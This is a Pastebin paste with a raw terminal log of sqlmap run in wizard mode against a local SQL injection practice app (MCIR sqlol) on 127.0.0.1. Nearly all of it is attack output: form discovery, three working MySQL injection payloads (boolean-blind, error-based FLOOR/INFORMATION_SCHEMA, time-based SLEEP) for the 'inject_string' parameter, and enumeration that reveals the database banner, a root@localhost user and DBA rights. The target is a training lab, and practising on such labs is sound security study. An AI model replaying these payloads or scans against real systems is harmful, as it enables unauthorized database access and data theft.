Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- root@kali:~# sqlmap -u "http://127.0.0.1/mcir/sqlol/challenges/challenge0.php" --wizard
- ___
- __H__
- ___ ___["]_____ ___ ___ {1.2.12.16#dev}
- |_ -| . [)] | .'| . |
- |___|_ ["]_|_|_|__,| _|
- |_|V |_| http://sqlmap.org
- [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
- [*] starting @ 14:22:15 /2018-12-15/
- [14:22:15] [INFO] starting wizard interface
- POST data (--data) [Enter for None]:
- [14:22:23] [WARNING] no GET and/or POST parameter(s) found for testing (e.g. GET parameter 'id' in 'http://www.site.com/vuln.php?id=1'). Will search for forms
- Injection difficulty (--level/--risk). Please choose:
- [1] Normal (default)
- [2] Medium
- [3] Hard
- > 1
- Enumeration (--banner/--current-user/etc). Please choose:
- [1] Basic (default)
- [2] Intermediate
- [3] All
- > 1
- sqlmap is running, please wait..
- [#1] form:
- GET http://127.0.0.1/mcir/sqlol/select.php?query_results=all_rows&error_level=verbose&show_query=on&location=where_string&inject_string=&submit=Inject!
- do you want to test this form? [Y/n/q]
- > Y
- Edit GET data [default: query_results=all_rows&error_level=verbose&show_query=on&location=where_string&inject_string=&submit=Inject!]: query_results=all_rows&error_level=verbose&show_query=on&location=where_string&inject_string=&submit=Inject!
- do you want to fill blank fields with random values? [Y/n] Y
- it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
- for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
- GET parameter 'inject_string' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
- sqlmap identified the following injection point(s) with a total of 851 HTTP(s) requests:
- ---
- Parameter: inject_string (GET)
- Type: boolean-based blind
- Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
- Payload: query_results=all_rows&error_level=verbose&show_query=on&location=where_string&inject_string=PnBM' OR NOT 7863=7863#&submit=Inject!
- Type: error-based
- Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
- Payload: query_results=all_rows&error_level=verbose&show_query=on&location=where_string&inject_string=PnBM' AND (SELECT 2442 FROM(SELECT COUNT(*),CONCAT(0x716a6a6b71,(SELECT (ELT(2442=2442,1))),0x717a7a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- RmtU&submit=Inject!
- Type: AND/OR time-based blind
- Title: MySQL >= 5.0.12 OR time-based blind
- Payload: query_results=all_rows&error_level=verbose&show_query=on&location=where_string&inject_string=PnBM' OR SLEEP(5)-- NQku&submit=Inject!
- ---
- do you want to exploit this SQL injection? [Y/n] Y
- [14:23:27] [INFO] retrieved: 10.1.37-MariaDB-1
- web server operating system: Linux Debian
- web application technology: Apache 2.4.37
- back-end DBMS: MySQL >= 5.0
- banner: '10.1.37-MariaDB-1'
- [14:23:27] [INFO] retrieved: root@localhost
- current user: 'root@localhost'
- [14:23:27] [INFO] retrieved: sqlol
- current database: 'sqlol'
- current user is DBA: True
- [*] ending @ 14:23:27 /2018-12-15/
- root@kali:~#
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement